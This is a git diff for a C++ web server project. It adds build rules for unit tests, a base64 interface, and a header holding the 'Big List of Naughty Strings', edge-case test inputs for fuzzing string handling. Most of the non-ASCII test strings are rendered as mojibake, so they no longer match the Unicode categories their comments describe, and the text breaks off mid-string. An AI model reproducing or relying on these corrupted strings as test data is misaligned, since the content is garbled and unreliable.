diff options
-rw-r--r-- | CMakeLists.txt | 36 | ||||
m--------- | GSL | 0 | ||||
m--------- | googletest | 0 | ||||
-rw-r--r-- | include/base64.hpp | 9 | ||||
-rw-r--r-- | include/big_list_of_naughty_strings.hpp | 687 | ||||
-rw-r--r-- | include/token_authorization_middleware.hpp | 23 | ||||
-rw-r--r-- | scripts/file_to_string_array.py | 29 | ||||
-rw-r--r-- | src/base64.cpp | 138 | ||||
-rw-r--r-- | src/base64_test.cpp | 62 | ||||
-rw-r--r-- | src/blns.txt | 685 | ||||
-rw-r--r-- | src/gtest_main.cpp | 6 | ||||
-rw-r--r-- | src/token_authorization_middleware.cpp | 49 | ||||
-rw-r--r-- | src/token_authorization_middleware_test.cpp | 26 | ||||
-rw-r--r-- | src/webserver_main.cpp (renamed from src/example.cpp) | 146 |
14 files changed, 1801 insertions, 95 deletions
diff --git a/CMakeLists.txt b/CMakeLists.txt index 323747afa8..140b9cbe93 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -57,22 +57,50 @@ include_directories(g3log/src) # Debug sanitizers find_package(Sanitizers) +# C++ GSL (Guideline support libraries) +include_directories(GSL/include) + +set(WEBSERVER_MAIN src/webserver_main.cpp) set(SRC_FILES - src/example.cpp include/crow_g3_logger.hpp include/ssl_key_handler.hpp include/color_cout_g3_sink.hpp + src/token_authorization_middleware.cpp + src/base64.cpp ) -# Executable +set(UT_FILES + src/gtest_main.cpp + src/base64_test.cpp + src/token_authorization_middleware_test.cpp + ${CMAKE_BINARY_DIR}/generated/blns.hpp +) -add_executable(bmcweb ${SRC_FILES}) -#target_link_libraries(example crow) +# big list of naughty strings +file(MAKE_DIRECTORY "${CMAKE_BINARY_DIR}/generated") +add_custom_command(OUTPUT ${CMAKE_BINARY_DIR}/generated/blns.hpp + COMMAND xxd -i ${CMAKE_CURRENT_SOURCE_DIR}/src/blns.txt ${CMAKE_BINARY_DIR}/generated/blns.hpp) + +# googletest +#find_package(GTest REQUIRED) +enable_testing() +find_package(GTest REQUIRED) + +add_executable(unittest ${SRC_FILES} ${UT_FILES}) +target_link_libraries(unittest GTest::GTest GTest::Main) +target_link_libraries(unittest Boost::boost Boost::system) +target_link_libraries(unittest ${CMAKE_THREAD_LIBS_INIT}) +target_link_libraries(unittest OpenSSL::SSL OpenSSL::Crypto) +target_link_libraries(unittest g3logger) + +# bmcweb +add_executable(bmcweb ${WEBSERVER_MAIN} ${SRC_FILES}) target_link_libraries(bmcweb Boost::boost Boost::system) target_link_libraries(bmcweb ${CMAKE_THREAD_LIBS_INIT}) target_link_libraries(bmcweb OpenSSL::SSL OpenSSL::Crypto) target_link_libraries(bmcweb g3logger) + include_directories(${CMAKE_CURRENT_SOURCE_DIR}/include) # this needs to be at the end to make sure all includes are handled correctly diff --git a/GSL b/GSL new file mode 160000 +Subproject 3819df6e378ffccf0e29465afe99c3b324c2aa7 diff --git a/googletest b/googletest new file mode 160000 +Subproject aa148eb2b7f70ede0eb10de34b6254826bfb34f diff --git a/include/base64.hpp b/include/base64.hpp new file mode 100644 index 0000000000..f5ff338cae --- /dev/null +++ b/include/base64.hpp @@ -0,0 +1,9 @@ +#include <gsl/string_span> +#include <string> + +namespace base64 { + + bool base64_encode(const gsl::cstring_span<> &input, std::string &output); + bool base64_decode(const gsl::cstring_span<> &input, std::string &output); + +}
\ No newline at end of file diff --git a/include/big_list_of_naughty_strings.hpp b/include/big_list_of_naughty_strings.hpp new file mode 100644 index 0000000000..4ba27f73e4 --- /dev/null +++ b/include/big_list_of_naughty_strings.hpp @@ -0,0 +1,687 @@ +const std::string naughty_strings[] = { +// sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt + +// Reserved Strings +// +// Strings which may be used elsewhere in code + +"undefined", +"undef", +"null", +"NULL", +"(null)", +"nil", +"NIL", +"true", +"false", +"True", +"False", +"TRUE", +"FALSE", +"None", +"hasOwnProperty", +"\\", +"\\\\", + +// Numeric Strings +// +// Strings which can be interpreted as numeric + +"0", +"1", +"1.00", +"$1.00", +"1/2", +"1E2", +"1E02", +"1E+02", +"-1", +"-1.00", +"-$1.00", +"-1/2", +"-1E2", +"-1E02", +"-1E+02", +"1/0", +"0/0", +"-2147483648/-1", +"-9223372036854775808/-1", +"-0", +"-0.0", +"+0", +"+0.0", +"0.00", +"0..0", +".", +"0.0.0", +"0,00", +"0,,0", +",", +"0,0,0", +"0.0/0", +"1.0/0.0", +"0.0/0.0", +"1,0/0,0", +"0,0/0,0", +"--1", +"-", +"-.", +"-,", +"999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", +"NaN", +"Infinity", +"-Infinity", +"INF", +"1#INF", +"-1#IND", +"1#QNAN", +"1#SNAN", +"1#IND", +"0x0", +"0xffffffff", +"0xffffffffffffffff", +"0xabad1dea", +"123456789012345678901234567890123456789", +"1,000.00", +"1 000.00", +"1'000.00", +"1,000,000.00", +"1 000 000.00", +"1'000'000.00", +"1.000,00", +"1 000,00", +"1'000,00", +"1.000.000,00", +"1 000 000,00", +"1'000'000,00", +"01000", +"08", +"09", +"2.2250738585072011e-308", + +// Special Characters +// +// ASCII punctuation. All of these characters may need to be escaped in some +// contexts. Divided into three groups based on (US-layout) keyboard position. + +",./;'[]\\-=", +"<>?:\"{}|_+", +"!@#$%^&*()`~", + +// Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, +// and U+007F (DEL) +// Often forbidden to appear in various text-based file formats (e.g. XML), +// or reused for internal delimiters on the theory that they should never +// appear in input. +// The next line may appear to be blank or mojibake in some viewers. +"", + +// Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. +// Commonly misinterpreted as additional graphic characters. +// The next line may appear to be blank, mojibake, or dingbats in some viewers. +"ᅡタᅡチᅡツᅡテᅡトᅡニᅡヌᅡネᅡノᅡハᅡヒᅡフᅡヘᅡホᅡマᅡミᅡムᅡメᅡモᅡヤᅡユᅡヨᅡラᅡリᅡルᅡレᅡロᅡワᅡンᅡ゙ᅡ゚", + +// Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode +// version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), +// and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often +// treated as whitespace in some contexts. +// This file unfortunately cannot express strings containing +// U+0000, U+000A, or U+000D (NUL, LF, CR). +// The next line may appear to be blank or mojibake in some viewers. +// The next line may be flagged for \"trailing whitespace\" in some viewers. +" "," ᅡナ £レタ¬タタ¬タチ¬タツ¬タテ¬タト¬タナ¬タニ¬タヌ¬タネ¬タノ¬タハ¬タヒ¬タᄄ¬タᄅ¬タᆵ¬チ゚ ̄タタ", + +// Unicode additional control characters: all of the characters with +// general category Cf (in Unicode 8.0.0). +// The next line may appear to be blank or mojibake in some viewers. +"ᅡᆳタチツテトナワᅴンᅵマ£ᅠホ¬タヒ¬タフ¬タヘ¬タホ¬タマ¬タᆰ¬タᆱ¬タᆲ¬タᆳ¬タᆴ¬チᅠ¬チᄀ¬チᄁ¬チᆪ¬チᄂ¬チᆭ¬チᄃ¬チᄄ¬チᄅ¬チᆰ¬チᆱ¬チᆲ¬チᆳ¬チᆴ¬チᆵᄏᄍᄎᄏムツᄑロᄇᅠロᄇᄀロᄇᄁロᄇᆪンナᄈンナᄡンナᄉンナᄊンナᄋンナᄌンナᄍンナᄎᅠタチᅠタᅠᅠタᄀᅠタᄁᅠタᆪᅠタᄂᅠタᆬᅠタᆭᅠタᄃᅠタᄄᅠタᄅᅠタᆰᅠタᆱᅠタᆲᅠタᆳᅠタᆴᅠタᆵᅠタᄚᅠタᄆᅠタᄇᅠタᄈᅠタᄡᅠタᄉᅠタᄊᅠタᄋᅠタᄌᅠタᄍᅠタᄎᅠタᄏᅠタᄐᅠタᄑᅠタᄒᅠタᅠチタᅠチチᅠチツᅠチテᅠチトᅠチナᅠチニᅠチヌᅠチネᅠチノᅠチハᅠチヒᅠチフᅠチヘᅠチホᅠチマᅠチミᅠチムᅠチメᅠチモᅠチヤᅠチユᅠチヨᅠチラᅠチリᅠチルᅠチレᅠチロᅠチワᅠチンᅠヂᅠチ゚ᅠチᅠᅠチᄀᅠチᄁᅠチᆪᅠチᄂᅠチᆬᅠチᆭᅠチᄃᅠチᄄᅠチᄅᅠチᆰᅠチᆱᅠチᆲᅠチᆳᅠチᆴᅠチᆵᅠチᄚᅠチᄆᅠチᄇᅠチᄈᅠチᄡᅠチᄉᅠチᄊᅠチᄋᅠチᄌᅠチᄍᅠチᄎᅠチᄏᅠチᄐᅠチᄑᅠチᄒᅠチ", + +// \"Byte order marks\", U+FEFF and U+FFFE, each on its own line. +// The next two lines may appear to be blank or mojibake in some viewers. +"ᄏ", +"ᄒ", + +// Unicode Symbols +// +// Strings which contain common unicode symbols (e.g. smart quotes) + +"ᅫᄅ¬ノネᅢᄃ¬ネレ¬ネᆱᅨワᅡᄉ¬ノᄂ¬ノᆬᅢᄋ", +"ᅢᆬᅢ゚¬ネツᅥメᅡ례ル¬ネニᅨレᅡᆲ¬タᆭᅢᆭ", +"ᅤモ¬ネムᅡᄡᅡᆴ¬タᅠᅡᆬᅡ뗴ニᅢ죄タ¬タワ¬タリ", +"ᅡᄀ¬ト깏ᅡᄁ¬ネ゙ᅡ다ᄊ¬タ깕ᅡᄎ¬タモ¬ノᅠ", +"ᅡ졔ロᅢヌ¬ラハᅣ몌ワᅢツᅡᆵᅨリᅡ", +"ᅢナᅢヘᅢホᅢマᅨンᅢモᅢヤᆪᅢメᅢレᅢニ¬リテ", +"ᅤメ¬ダᅡᄡ¬タᄚᅨヌᅢチᅡ뗴ニᅢリ¬ネマ¬タン¬タル", +"`¬チト¬ツᆲ¬タᄍ¬タᄎᆲチᆲツ¬タ가ᄚᅡᄋ¬タレ¬タヤᅡᄆ", +"¬ナロ¬ナワ¬ナン¬ナ゙", +"チツテトナニヌネノハヒフヘホマミムメモヤユヨラリルレロワン゙゚ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅᆰᆱᆲᆳᆴᆵᄚᄆᄇᄈᄡᄉᄊᄋᄌᄍᄎᄏᄐᄑᄒタチツテトナニヌネノハヒフヘホマ", +"ᅠᄀᄁᆪᄂᆬᆭᄃᄄᄅ", + +// Unicode Subscript/Superscript/Accents +// +// Strings which contain unicode subscripts/superscripts; can cause rendering issues + +"¬チᄚ¬チᄡ¬チᄉ", +"¬ツタ¬ツチ¬ツツ", +"¬チᄚ¬チᄡ¬チᄉ¬ツタ¬ツチ¬ツツ", +"¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ ¢ᄌヤ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍノ¢ᄍヌ¢ᄍヌ¢ᄍヌ¢ᄍヌ", + +// Quotation Marks +// +// Strings which contain misplaced quotation marks; can cause encoding errors + +"'", +"\"", +"''", +"\"\"", +"'\"'", +"\"''''\"'\"", +"\"'\"'\"''''\"", +"<foo val=¬タワbar¬タン />", +"<foo val=¬タワbar¬タン />", +"<foo val=¬タンbar¬タワ />", +"<foo val=`bar' />", + +// Two-Byte Characters +// +// Strings which contain two-byte characters: can cause rendering issues or character-length issues + +"ヤᄚ¦ᄌᆳ ̄チユ ̄ツモ ̄チᆱ ̄チツ ̄チメ ̄チᆭ¦ᄌヒ ̄チユ ̄チト", +" ̄テム ̄テᄐ ̄テニ ̄ツᆪ ̄テᄐ ̄チᄌ│ᄀフ ̄チヒ ̄チᆰ ̄チト ̄チヒ", +"¥メフ│ᆪᄑ₩ᄐᄁ│ᆰ゙", +"←テᄄ│ミᄑ₩ᅠᄐ", +"↓ツᆲ■レフ↑ᄈᄐ■ユル↓ロミ ↓ヨᄡ■ユル↓ラᄚ↑ᄉᆲ↓ニフ", +"↓ᄚᆭ↓ᄚᄄ→ᆬᄐ ■テタ↑ᄈᅠ ↓リᄄ ■ホᄇ↓ヒワ→ᄃᄄ↑ᄈᄐ ↓ムロ→ヒᄂ→ᆭᆲ →リᅠ→ᄚᄅ↑ᄚチ■ユリ", +"ᄂᄒ₩ワテᄃム¥ᆳᄌ←ルᄁ│ᆰ゙¥ᆳᄌᅠヤᄅᄊ₩ノタ", +"↓レᄌ→゙タ→ᄚヤ■ニᅠ→ᆬᄡ", +"ᅠワホᅠワᄆᅠンᄍᅠᄆモᅠᄆᄌᅠᄇヨᅠᄈマ", + +// Changing length when lowercased +// +// Characters which increase in length (2 to 3 bytes) when lowercased +// Credit: https://twitter.com/jifa/status/625776454479970304 + +"ᄎ", +"ᄒ", + +// Japanese Emoticons +// +// Strings which consists of Japanese-style emoticons which are popular on the web + +" ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ  ̄テᄑ¢ᄐᄐ¢ᄎネトᅪワ¢ᄎネ¢ᄐᄑᄒノ", +"(ᄑᄀ¬ラユ ¬ネタ ¬ラユᄑᄀ)", +"ᄑタᄑᄄ(ᅡᄡ¬ネタᄑタ¬ネᄅ", +"__ᄒロ(,_,*)", +" ̄テᄏ(ᆪ¬ネタᆪ) ̄テᄏ:*:", +"ᄒ゚ᄑᆬ¬ワ ̄テᄒ¬ユᄇ(ᄑᄀ¬ラユ¬タ¬ラユᄑᄀ)¬ユᄆ¬ワᄑᆬᄒ゚", +", ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル( ¬リᄏ ᅬノ ¬リᄏ ) ̄タツ ̄テᄏ:*: ̄テᄏ ̄ツワ¬タル", +"(¬ユᆵᅡᄚ¬ヨ가ᄚᄐノ¬ユᆵᄌᄉ ¬ヤᄏ¬ヤチ¬ヤᄏ)", +"(ᄒノ¢ᄇᆬロハ¢ᄇᆬᄐノᄒノᄏ ¬ヤᄏ¬ヤチ¬ヤᄏ", +"¬ヤᆲ¬ヤタ¬ヤᆲ ̄テホ( ᅡᄎ _ ᅡᄎ ̄テホ)", +"( ᅪ가ᄚ ᅪワᅧヨ ᅪ가ᄚ)", + +// Emoji +// +// Strings which contain Emoji; should be the same behavior as two-byte characters, but not always + +"゚リヘ", +"゚ムᄅ゚マᄑ", +"゚ムᄒ ゚ルヌ ゚メチ ゚ルナ ゚ルニ ゚ルヒ ゚ルホ ゚ルヘ", +"゚ミᄉ ゚ルネ ゚ルノ ゚ルハ", +"¬ンᄂᄌマ ゚メヤ ゚メフ ゚メユ ゚メ゙ ゚メモ ゚メラ ゚メヨ ゚メリ ゚メン ゚メ゚ ゚メワ ゚メロ ゚メレ ゚メル", +"¬ワピマ ゚メᆰ゚マ ゚ムミ゚マ ゚ルプマ ゚ムマ゚マ ゚ルマ゚マ", +"゚レᄒ ゚ニメ ゚ニモ ゚ニユ ゚ニヨ ゚ニラ ゚ニル ゚マᄃ", +"0ᄌマ¬テᆪ 1ᄌマ¬テᆪ 2ᄌマ¬テᆪ 3ᄌマ¬テᆪ 4ᄌマ¬テᆪ 5ᄌマ¬テᆪ 6ᄌマ¬テᆪ 7ᄌマ¬テᆪ 8ᄌマ¬テᆪ 9ᄌマ¬テᆪ ゚ヤ゚", + +// Regional Indicator Symbols +// +// Regional Indicator Symbols can be displayed differently across +// fonts, and have a number of special behaviors + +"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ゚ヌᄌ", +"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ゚ヌᆱ゚ヌᆭ゚ヌᄇ", +"゚ヌᄎ゚ヌᄌ゚ヌᄋ゚ヌᄎ゚ヌᄌ゚ヌᆭ", + +// Unicode Numbers +// +// Strings which contain unicode numbers; if the code is localized, it should see the input as numeric + +"ᄐムᄐメᄐモ", +"ᄀᄁᆪ", + +// Right-To-Left Strings +// +// Strings which contain text that should be rendered RTL if possible (e.g. Arabic, Hebrew) + +"ᆱナ ニチᄈ ᄈツᄋᆰ ネᄄᄃトᆰᆳᆵハᆵフ, ᆲᄇハᄆᆰハ ᄄᄃᄈᆰᆴᆵᄃナ ᆪニ ᆵニネ. ᆬᄚ ヌニᄃ゚ ᄃトᄈᆰᄃᄆ ネᆰニᄉハᄄ テᄃニ. ᆪヌムト ᄃハᄋᄃトハᄃフ ᄄᄆハᄋᄃニハᄃ-チᄆニᄈᄃ ツᆵ ᆪᆴᄚ. ᄈトハナᄃニフ ᆬᆰチᄃツハᄅ ᄄハニ ナᄃ, ハᄚテᄆ ᄃトᆳᆵネᆵ ᆪハ ᄄᄍᆵ, ナᄍᄃナトᄅ ᄄネトニᆵᄃフ ᄃトᆬᄋトᄃツ ᄍト ᆬハネ.", +"ᅲムᅱᄚᅱ튜뛰슈ミᅲ뤼ᄡᅲチᅲルᅲᆰ, ᅲムᅱ쥐튜뛰쥬ミ ᅲミᅱ뮤ワᅱ쮸ヤᅱᄡᅲルᅲン, ᅲミᅱ슑 ᅲヤᅱ유뤼쥐튜チᅲ゙ᅱ유ルᅱᄡᅲン, ᅲユᅱᄚᅲミᅱ슑 ᅲヤᅱ쥬ミᅱ쥬뛰쓙", +"ᅲヤᅱ쥬ルᅱᄚᅲᆰᅱ쥬ヤtestᄃトᄉチᆳᄃᆰ ᄃトᆰムᆳネト", +"ᄋᄑ", +"ᄋᄎ", +"ナマニホᄃツホᄡホᄅマ ᄈマᄄマトミ ᄃミᄈメᆰミᆴメᆵホᄃナミ ᄃトトムマᄎホᄅミ チミハ ᄃトニムマᄌマナミ ᄃトメツホᄃᆭミナホᄅミ ネホチミハナ ハホᆴマᄉムホ ᄃトᆰムホᄋメᄄミハツホᄃᆰマ ᄃトメᆳᄃᄈマネᄄミハムホᄅマフ ", + +// Trick Unicode +// +// Strings which contain unicode with unusual properties (e.g. Right-to-left override) (c.f. http://www.unicode.org/charts/PDF/U2000.pdf) + +"¬タᆰ¬タᆰtest¬タᆰ", +"¬タᆱtest¬タᆱ", +"¬タᄅtest¬タᄅ", +"test¬チᅠtest¬タᆱ", +"¬チᆭtest¬チᄃ", + +// Zalgo Text +// +// Strings which contain \"corrupted\" text. The corruption will not appear in non-HTML text, however. (via http://www.eeemo.net) + +"£ᄍᄚᅩ초초ユoᅪ゙ ᅩᄋiᅩ볿ᅪヌᅩᆰᅪルnᅩンᅩラᅪユvᅩ゚ᅩワᅩリᅩᆭᅪ゚oᅩ쏘ルᅩᄚᅩᅠkᅢ똬レᅩᆴᅩ촑ᅩ쪼모ᄂ ᅩヨtᅩンᅪユᅩ뽃ᅩ콝ᅪ゙hᅩ톼モᅩ볺ᅩ뽀リᅩᄇeᅪヌᅩᆪᅩᄚᅩᆭᅩᆲᅪホ ᅩ꼬토코모リhᅪレᅪホᅪルᅩワᅩᆪᅩ봐ナiᅩᆭᅩ볷ᅩᄚᅩᄂvᅩ콰ヘeᅩ촔ᅩ뽉ᅩᄚ-mᅩᄁiᅪナnᅩヨᅩ초゙ᅩ봂ᅩᄚdᅩ소토゚ᅪルᅩ로토リᅩᄈ ᅩ゙ᅩᆬᅩ모뽌rᅩロᅩラᅩリeᅪルpᅪᅠrᅩ토゙ᅩ콠ᅩラeᅩ초ᅠᅩᆪᅪ゚sᅩリᅪヌᅩ뽜ヘᅩンᅪノeᅪノᅩᆬᅩᆵᅩ゙ᅩ봐レᅩᆲᅪワᅦ쫇ᅪホᅪホᅩ゚ᅩヨᅪヌᅩᄂtᅪヘᅩᆲᅩ놔モᅩ톬ᅪリᅪナiᅩᆰᅩᄆnᅪᅠgᅩᄡᅪノ ᅪマᅪノᅪナcᅩᆲᅩ゚hᅪᄀaᅩᆱᅩ콢ᅪリoᅩᆱᅩ゚ᅩヨᅪヘᅩルᅩンᅪノsᅩラᅩᆭᅩᄇ.ᅩ또쫘ネᅩᆪ", +"ᅩ과モᅩ゙ᅪナIᅩラᅩリᅩᆭᅪンnᅪヌᅪヌᅪルvᅩᆴᅩᆱokᅩ볾ᅩルᅪネiᅩヨᅪルᅩᆳᅩ쪼ᅠᅩ゙nᅩ고콡ᅩᆪᅩᄎgᅩ봐ネᅪルᅩᆳᅪルᅩᆲᅪホ ᅩᄚtᅪヤᅩᆭhᅩ゙ᅩᄇeᅩ꼬ᄂ ᅪヘᅩᆲᅩ봐ヨfᅩᄡᅩリᅪユᅩᆪᅢ똬ヨ£ᄎ쫁ᅩᄅlᅪヨᅪヤᅪレiᅪモᅪレᅩᆭᅪᅠnᅪヨᅪヘᅩラᅪモᅩ뽍gᅪヘ ᅩᄄoᅪレᅩᆰᅪᄀfᅩリᅩᆪᅩᆲ ᅩヨᅩリᅪヨᅩ゚ᅪルᅩᆴcᅭノᅪヤᅩᆱᅪヨᅪモᅪヌᅪヨᅪナhᅩ소녻ᅪレᅪヤᅢ고ラᅩ톼ユᅪナoᅩ톣ᅩᆬsᅩ뫄ネᅩ초ヨᅩᆭᅩ콰ᄁ.ᅩロᅩヨᅩ゙ᅩᅠᅩᆱᅩᄚ", +"ᅩラᅩ촤ヨᅩ쫊ᅪモ£ᄍᆴᅩ놔ヘᅩᆬᅪヌᅪネhᅩ보チeᅪマᅪモᅩ토ラᅩルᅩ톣ᅪヤ ᅪヌᅩワᅩ모ᅠᅪモᅪヘᅪナNᅪユᅪᅠeᅩラᅩᄆzᅩリᅩンᅩワᅩ촤ルpᅩ노초쫘ヘᅩᆵᅪレeᅩᅠᅩ코ᅠᅪワrᅩ또놔ヘᅩ초ヨᅪヤᅩヨᅩヨdᅩᅠᅩ゚ᅩᆳᅩᆲᅩンᅪ゚iᅩᆭᅪヨᅩ롸モᅪヤᅩᄂaᅩᅠᅩラᅩᆲᅪノᅩルnᅪレᅪワ ᅩ코゙ᅩᄚᅪレᅪナhᅩ솨ノiᅩ뽀゙vᅩ꽈ヌ£ᄌルᅪホᅪ゚-ᅭノᅩᆳᅩ로톼ヤmᅩ놄ᅩᆱiᅪユᅪヌᅩンᅩᆭnᅩラᅪル£ᄌヘᅩ゚ ᅩᆵᅩ봐ユᅪ゙ᅦᆱᅩ゚ᅩᆵᅩᄚᅩ봐ルᅩ코ンf ᅩᆰᅩᄚᅩᄚᅩラᅩヨᅩᆳᅩリᅪリcᅩᆭᅪヘᅩ보゙ᅪヘᅩ로ル£ᄌᆬᅪレaᅩᆴᅪホᅩ゚ᅩルᅪワᅥ고로쫘ホsᅩᄂ.ᅩンᅩン ᅭノZᅩ고ヨᅩワᅪヨᅩᄚᅩᆪᅪノᅩワaᅪヨᅩᄚᅪルᅩᆲᅪᄀlᅩ볾ᅩ뽜ヘᅩᄅgᅩ고゚ᅩ토뫄レᅩ゙ᅩᆲᅪナoᅩラᅪワ.ᅩ゚", +"ᅩᆭHᅩᆲᅩ노ラᅩ놔ンeᅪワ ᅩワᅩᆬᅩンᅩ콰ヘᅩ゚ᅩチwᅩユhᅩヨᅩᆵᅪモoᅩンᅪルᅩヨᅪホᅩ몵 ᅭノᅩ초ルᅩ゙ᅩ゚ᅪネWᅩ오톬aᅩ촑ᅪヘᅣᆵᅪネᅪユᅩᆳᅪルᅩᆵᅩワtᅩ쏘톭sᅩリᅪルᅪヨᅩユ ᅩᅠᅩᆱᅩᅠBᅩ콰ヘᅪルᅪノᅩ뽜ナeᅩᄉhᅩ솗ᅪヌᅩᆱᅪルiᅩ쫘モᅩ뽀뽍ᅪホᅩᆱᅩユnᅪ゚dᅩᄡᅩᆰᅩワᅩヨ ᅩᄚᅪノᅩ롸ヌᅪルᅩ봐゙ᅪナTᅪヨᅩ톼モᅩᆰᅪᄁhᅪマᅪモᅩᆴᅩᄏeᅩᆲᅩンᅩ゚ᅪナ ᅩ노쪼ンWᅪルᅩ゙ᅩンᅪヤᅪヌᅪンᅪナaᅪマᅪモᅪヤᅩ쪼톣lᅩᄡᅪヤᅩᄚᅩ노゚ᅪヤ£ᄌ폶.ᅪユ", +"Zᅩᆴᅩ゙ᅩᅠᅪルᅪヤᅪナ£ᄌタᅩラᅩ゙ᅪネᅩ코ラ£ᄌ쏴ルᅪホᅩᆵᅩ쪼゙ᅪモGᅩᄏOᅩᆳᅩラᅩᆴ", + +// Unicode Upsidedown +// +// Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com) + +"ᅨルミnb£ᄡノlミ ミuᅥテミᆵ ᅦンᄍolop ᅧヌᅦン ᅦンᄍoqミl ᅧヌn ᅧヌunp£ᄡノp£ᄡノヤu£ᄡノ ᄍodᆵᅦンᅧヌ poᆵsn£ᄡノᅦン op pᅦンs 'ᅧヌ£ᄡノlᅦン ᅥテu£ᄡノヤs£ᄡノd£ᄡノpミ ᄍnᅧヌᅦンᅧヌヤᅦンsuoヤ 'ᅧヌᅦンᆵミ ᅧヌ£ᄡノs ᄍolop ᆵnsd£ᄡノ ᆵᅦンᄍoᅨᆬ", +"00ᅨルᅥヨ$-", + +// Unicode font +// +// Strings which contain bold/italic/etc. versions of normal characters + +"ᄐᄡᄑネᄑナ ᄑムᄑユᄑノᄑテᄑヒ ᄑツᄑメᄑマᄑラᄑホ ᄑニᄑマᄑリ ᄑハᄑユᄑヘᄑミᄑモ ᄑマᄑヨᄑナᄑメ ᄑヤᄑネᄑナ ᄑフᄑチᄑレᄑル ᄑトᄑマᄑヌ", +"ンミモンミᄀンミ゙ ンミᆰンミᆴンミᄁンミワンミᄂ ンミロンミᆱンミᄄンミᄚンミᄃ ンミ゚ンミᄄンミᄆ ンミᆪンミᆴンミᆭンミᄅンミᆲ ンミᄄンミᆵンミ゙ンミᆱ 